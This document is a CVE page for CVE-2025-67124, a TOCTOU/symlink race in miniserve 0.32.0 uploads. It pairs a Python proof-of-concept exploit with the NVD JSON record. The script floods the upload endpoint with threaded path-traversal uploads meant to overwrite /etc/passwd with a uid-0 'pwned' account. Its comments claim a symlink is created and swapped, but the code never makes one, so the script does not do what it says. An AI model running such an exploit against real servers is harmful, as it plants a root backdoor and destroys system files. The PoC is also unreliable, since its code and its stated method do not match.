CVE-2025-67124

#!/usr/bin/env python3 """ CVE-2025-67124 PoC - miniserve TOCTOU Race Condition This PoC demonstrates the time-of-check-time-of-use race condition in miniserve 0.32.0 upload finalization that allows arbitrary file overwrite via symlink race. """ import requests import threading import time import os import tempfile TARGET_URL = "http://target:8080" # Replace with target URL UPLOAD_PATH = "/upload" TARGET_FILE = "/etc/passwd" # File to overwrite MALICIOUS_CONTENT = b"pwned:$1$pwned$xyz:0:0:root:/root:/bin/sh\n" def create_symlink_and_race(): """ Create symlink race condition to overwrite arbitrary files. The race involves: check -> symlink swap -> write to symlink target """ # Step 1: Create initial symlink pointing to target file upload_dir_response = requests.get(f"{TARGET_URL}/upload") # Step 2: Prepare malicious file content files = { 'file': ('..%2F..%2F..' + TARGET_FILE.replace('/', '%2F'), MALICIOUS_CONTENT, 'application/octet-stream') } # Step 3: Send upload request with path traversal # The server checks the path, but due to TOCTOU race, we can win the race try: response = requests.post( f"{TARGET_URL}{UPLOAD_PATH}", files=files, timeout=5 ) print(f"Upload response: {response.status_code}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") def race_uploader(): """ Multi-threaded race condition uploader Creates rapid concurrent uploads to increase race window """ threads = [] for i in range(10): t = threading.Thread(target=create_symlink_and_race) threads.append(t) t.start() time.sleep(0.001) # Minimal delay between requests for t in threads: t.join() if __name__ == "__main__": print(f"[*] CVE-2025-67124 PoC for miniserve TOCTOU race") print(f"[*] Target: {TARGET_URL}") print(f"[*] Attempting to overwrite: {TARGET_FILE}") race_uploader() print("[*] Race condition attack completed")

{"cve": {"id": "CVE-2025-67124", "sourceIdentifier": "[email protected]", "published": "2026-01-23T16:15:52.247", "lastModified": "2026-02-11T19:45:43.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A TOCTOU and symlink race in svenstaro/miniserve 0.32.0 upload finalization (when uploads are enabled) can allow an attacker to overwrite arbitrary files outside the intended upload/document root in deployments where the attacker can create/replace filesystem entries in the upload destination directory (e.g., shared writable directory/volume)."}, {"lang": "es", "value": "Una carrera TOCTOU y de symlink en la finalización de carga de svenstaro/miniserve 0.32.0 (cuando las cargas están habilitadas) puede permitir a un atacante sobrescribir archivos arbitrarios fuera de la raíz de carga/documentos prevista en despliegues donde el atacante puede crear/reemplazar entradas del sistema de archivos en el directorio de destino de carga (p. ej., directorio/volumen compartido y escribible)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:svenstaro:miniserve:0.32.0:*:*:*:*:*:*:*", "matchCriteriaId": "161DB6D7-BAD9-420B-9C2B-E6A77F6F3152"}]}]}], "references": [{"url": "https://gist.github.com/thesmartshadow/55688f87f8b985eb530e07d00ef8c63f", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/svenstaro/miniserve", "source": "[email protected]", "tags": ["Product"]}]}}